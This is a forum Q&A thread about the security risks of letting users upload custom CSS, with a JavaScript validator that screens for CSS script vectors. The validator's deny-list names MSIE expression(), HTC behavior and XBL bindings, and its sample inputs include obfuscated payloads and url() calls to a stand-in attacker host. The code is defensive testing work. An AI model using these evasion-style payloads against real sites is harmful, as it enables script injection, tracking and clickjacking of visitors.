Is it safe to allow users to edit CSS?

Published 2019-06-17 05:12

Question:

I have a web application where I would like to allow end users to customise the look of the web site by uploading their own css file.

Are there any security issues with this? I can't see anything obvious but thought I'd ask in case there was anything I'd missed.

Answer 1:

JavaScript can be executed in CSS, so you have to make sure that you are using some filtering.

I have also seen incidents where someone has covered the entire page on a Microsoft-controlled site with a transparent pixel linking to a malicious site. Clicking anywhere triggered the attacker's site to appear.

This could, however, be safe if the user only sees his or her own CSS and there is no way for someone else to view what they have done. Otherwise some sort of whitelist or markdown would work.



Answer 2:

Short answer: no, it isn't. HTC in IE and XBL in Mozilla are both potential attack vectors. A hack of this nature was used to steal 30,000 MySpace passwords a while back.

Source: Simon Willison, Web Security Horror Stories



Answer 3:

I wouldn't do it, because CSS can show an image that could exploit some OS vulnerability, for example.

Regards.



Answer 4:

Depending on your server and its configuration, it may be possible to run server-side code from a CSS file (though this isn't default behavior on any server I know).



Answer 5:

Short answer: no. First bad things that come to mind are MSIE expressions.



Answer 6:

If these CSS files are available to all site users, and not just to the person who uploaded them, then there's a possible XSRF vector: you could include links to offsite resources in the CSS which have "undesirable" effects on the user requesting them.
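The vectors raised in Answers 1, 2, 5 and 6 (script execution from CSS, HTC `behavior:`, XBL `-moz-binding`, MSIE `expression()`, and off-site `url()` references that fire requests on behalf of whoever views the sheet) can all be screened for with one conservative validator. The following JavaScript is an added example and is not code from the question or any of the answers; the function name `validateUserCss`, the `ALLOWED_URL_ORIGIN` policy, the size cap and the sample sheets are assumptions. It normalises the sheet first (strips comments, decodes CSS escapes) so that `exp/**/ression` or `e\78 pression` cannot slip past a naive keyword check, rejects off-site resources, and flags the transparent full-page overlay from Answer 1 as a warning, since that shape is only a heuristic.

```javascript
'use strict';
// Added example, not code from the question or any answer above. The names
// validateUserCss, ALLOWED_URL_ORIGIN and the sample sheets are assumptions.

// Assumption: the only host a user stylesheet may pull resources from.
const ALLOWED_URL_ORIGIN = 'https://static.example.com';

// Vectors named in the answers above, plus javascript: URLs. Matched after
// normalisation, so comment splitting and CSS escapes do not hide them.
const FORBIDDEN = [
  ['MSIE expression()',        /expression\s*\(/i],
  ['MSIE HTC behavior',        /behavior\s*:/i],
  ['Mozilla XBL -moz-binding', /-moz-binding\s*:/i],
  ['javascript: URL',          /javascript\s*:/i],
  ['@import of another sheet', /@import\b/i],
];

// Drop /* comments */ so that "exp/**/ression" is seen as "expression".
function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Resolve CSS escapes: "\78 " is "x" and "\:" is ":", so "e\78 pression" becomes "expression".
function decodeEscapes(css) {
  return css
    .replace(/\\([0-9a-fA-F]{1,6})[ \t\n]?/g, (_, hex) => {
      const cp = parseInt(hex, 16);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : '\ufffd';
    })
    .replace(/\\([^\n])/g, '$1');
}

function normalize(css) {
  return decodeEscapes(stripComments(css)).replace(/\s+/g, ' ');
}

// Answer 6: every url() must point at our own host or be a same-origin absolute path.
// Scheme-relative "//host/..." and bare relative paths are rejected on purpose.
function checkUrls(css, errors) {
  const re = /url\(\s*(['"]?)([^'")]*)\1\s*\)/gi;
  let m;
  while ((m = re.exec(css)) !== null) {
    const target = m[2].trim();
    const ours = target.startsWith(ALLOWED_URL_ORIGIN + '/') ||
                 (target.startsWith('/') && !target.startsWith('//'));
    if (!ours) errors.push(`off-site resource: url(${target})`);
  }
}

// Answer 1: an out-of-flow element made fully transparent is the shape of a
// clickjacking overlay. Heuristic only, so it is reported as a warning.
function checkOverlays(css, warnings) {
  const blockRe = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = blockRe.exec(css)) !== null) {
    const [, selector, body] = m;
    const outOfFlow = /position\s*:\s*(fixed|absolute)/i.test(body);
    const invisible = /opacity\s*:\s*0(\.0+)?(\s|;|$)/i.test(body);
    if (outOfFlow && invisible) warnings.push(`possible invisible overlay: ${selector.trim()}`);
  }
}

function validateUserCss(rawCss) {
  const errors = [];
  const warnings = [];
  if (rawCss.length > 64 * 1024) errors.push('stylesheet too large'); // assumption: 64 KiB cap
  const css = normalize(rawCss);
  for (const [name, re] of FORBIDDEN) if (re.test(css)) errors.push(name);
  checkUrls(css, errors);
  checkOverlays(css, warnings);
  return { ok: errors.length === 0, errors, warnings };
}

// Constructed sample uploads (not real user data).
const SAMPLES = {
  benign:  'body { background: url(/img/bg.png); color: #333 }',
  expr:    'div { width: e\\78 pression(alert(1)) }',          // escaped "expression"
  htc:     'body { beha/**/vior: url(/evil.htc) }',            // comment-split "behavior"
  xbl:     'p { -moz-binding: url("https://attacker.example/x.xml#b") }',
  offsite: 'h1 { background: url("https://attacker.example/track.gif") }',
  overlay: 'a#cover { position: fixed; top: 0; left: 0; width: 100%; height: 100%; opacity: 0 }',
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, css] of Object.entries(SAMPLES)) console.log(name, validateUserCss(css));
}
```

Running the file prints a verdict per sample: `benign` passes, `expr`, `htc`, `xbl` and `offsite` are rejected with the matching reason, and `overlay` passes but carries a warning for human review. A deny-list like `FORBIDDEN` is only the floor; for sheets that other users will see, combine it with the approach Answer 1 suggests and whitelist the properties you actually want to allow, and serve the result with `Content-Type: text/css` and `X-Content-Type-Options: nosniff` so the upload cannot be reinterpreted as anything else.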



Answer 7:

You may get customer-support overhead if a user's custom CSS messes up the screen to such an extent that he can't find the controls to reset it. In that case you, as admin, will need to do it manually.

For that case, a possible solution: arrange for a specific URL to reset the style. Something like:

http://mysite.com/users/234234/reset

And advise the user, when he's about to modify the style, to remember this URL and just follow it if things have gone out of control. When hit, the custom styles will be deactivated.



Tags: css security